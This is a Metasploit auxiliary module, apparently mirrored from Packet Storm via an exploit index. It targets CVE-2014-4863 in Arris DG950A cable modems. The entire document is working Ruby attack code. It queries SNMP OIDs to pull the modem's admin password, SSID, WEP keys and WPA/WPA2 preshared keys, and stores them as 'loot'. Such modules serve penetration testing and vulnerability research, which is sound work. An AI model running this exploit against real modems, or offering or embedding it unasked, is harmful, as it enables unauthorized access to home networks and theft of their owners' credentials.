Share
## https://sploitus.com/exploit?id=PACKETSTORM:180915
##  
# This module requires Metasploit: https://metasploit.com/download  
# Current source: https://github.com/rapid7/metasploit-framework  
##  
  
class MetasploitModule < Msf::Auxiliary  
include Msf::Exploit::Remote::SNMPClient  
include Msf::Auxiliary::Report  
include Msf::Auxiliary::Scanner  
  
def initialize  
super(  
'Name' => 'Arris DG950A Cable Modem Wifi Enumeration',  
'Description' => %q{  
This module will extract WEP keys and WPA preshared keys from  
Arris DG950A cable modems.  
},  
'References' =>  
[  
['CVE','2014-4863'],  
['URL', 'https://www.rapid7.com/blog/post/2014/08/21/more-snmp-information-leaks-cve-2014-4862-and-cve-2014-4863/']  
],  
'Author' => ['Deral "Percent_X" Heiland'],  
'License' => MSF_LICENSE  
)  
end  
  
def run_host(ip)  
snmp = connect_snmp  
  
if snmp.get_value('sysDescr.0') =~ /DG950A/  
print_line("#{ip}")  
  
# System Admin Password  
wifi_info = ''  
password = snmp.get_value('1.3.6.1.4.1.4491.2.4.1.1.6.1.2.0')  
print_line("Password: #{password}")  
wifi_info << "Password: #{password}" << "\n"  
else  
fail_with(Failure::NoTarget, "Does not appear to be an Arris DG950A")  
end  
  
# check WPA Encryption Algorithm  
encrypt_type = snmp.get_value('1.3.6.1.4.1.4115.1.20.1.1.3.26.1.1.12')  
case encrypt_type  
when 1  
wpa_encrypt = "TKIP"  
when 2  
wpa_encrypt = "AES"  
when 3  
wpa_encrypt = "TKIP/AES"  
else  
wpa_encrypt = "Unknown"  
end  
  
# Wifi Status  
wifi_status = snmp.get_value('1.3.6.1.2.1.2.2.1.8.12')  
if wifi_status == '1'  
ssid = snmp.get_value('1.3.6.1.4.1.4115.1.20.1.1.3.22.1.2.12')  
print_line("SSID: #{ssid}")  
wifi_info << "SSID: #{ssid}" << "\n"  
  
# Wifi Security Settings  
wifi_version = snmp.get_value('1.3.6.1.4.1.4115.1.20.1.1.3.22.1.5.12')  
if wifi_version == '0'  
print_line('Open Access Wifi is Enabled')  
wifi_info << 'Open Access WIFI is Enabled' << '\n'  
  
# WEP enabled  
elsif wifi_version == '1'  
wep_type = snmp.get_value('1.3.6.1.4.1.4115.1.20.1.1.3.23.1.2.12')  
case wep_type  
when 1  
oid = "1.3.6.1.4.1.4115.1.20.1.1.3.24.1.2.12"  
when 2  
oid = "1.3.6.1.4.1.4115.1.20.1.1.3.25.1.2.12"  
else  
print_line('FAILED')  
end  
wepkey1 = snmp.get_value("#{oid}.1")  
key1 = "#{wepkey1}"  
print_line("WEP KEY1: #{key1}")  
wifi_info << "WEP KEY1: #{key1}" << "\n"  
wepkey2 = snmp.get_value("#{oid}.2")  
key2 = "#{wepkey2}"  
print_line("WEP KEY2: #{key2}")  
wifi_info << "WEP KEY2: #{key2}" << "\n"  
wepkey3 = snmp.get_value("#{oid}.3")  
key3 = "#{wepkey3}"  
print_line("WEP KEY3: #{key3}")  
wifi_info << "WEP KEY3: #{key3}" << "\n"  
wepkey4 = snmp.get_value("#{oid}.4")  
key4 = "#{wepkey4}"  
print_line("WEP KEY4: #{key4}")  
wifi_info << "WEP KEY4: #{key4}" << "\n"  
  
# WPA enabled  
elsif wifi_version == '2'  
wpapsk = snmp.get_value('1.3.6.1.4.1.4115.1.20.1.1.3.26.1.2.12')  
print_line("WPA PSK: #{wpapsk}")  
print_line("WPA Encryption: #{wpa_encrypt}")  
wifi_info << "WPA PSK: #{wpapsk}" << "\n"  
wifi_info << "WPA Encryption #{wpa_encrypt}" << "\n"  
  
# WPA2 enabled  
elsif wifi_version == '3'  
wpapsk2 = snmp.get_value('1.3.6.1.4.1.4115.1.20.1.1.3.26.1.2.12')  
print_line("WPA2 PSK: #{wpapsk2}")  
print_line("WPA2 Encryption: #{wpa_encrypt}")  
wifi_info << "WPA2 PSK: #{wpapsk2}" << "\n"  
wifi_info << "WPA2 Encryption: #{wpa_encrypt}" << "\n"  
  
# WPA/WPA2 enabled  
elsif wifi_version == '7'  
wpawpa2psk = snmp.get_value('1.3.6.1.4.1.4115.1.20.1.1.3.26.1.2.12')  
print_line("WPA/WPA2 PSK: #{wpawpa2psk}")  
print_line("WPA/WPA2 Encryption: #{wpa_encrypt}")  
wifi_info << "WPA/WPA2 PSK: #{wpawpa2psk}" << "\n"  
wifi_info << "WPA/WPA2 Encryption: #{wpa_encrypt}" << "\n"  
  
else  
print_line('FAILED')  
end  
else  
print_line('WIFI is not enabled')  
end  
  
# Woot we got loot.  
loot_name = 'arris_wifi'  
loot_type = 'text/plain'  
loot_filename = 'arris_wifi.text'  
loot_desc = 'Arris DG950A Wifi configuration data'  
p = store_loot(loot_name, loot_type, datastore['RHOST'], wifi_info, loot_filename, loot_desc)  
print_good("WiFi Data saved in: #{p}")  
# No need to make noise  
rescue ::SNMP::UnsupportedVersion  
rescue ::SNMP::RequestTimeout  
raise $ERROR_INFO  
rescue ::Exception => e  
print_error("#{ip} error: #{e.class} #{e.message}")  
disconnect_snmp  
end  
end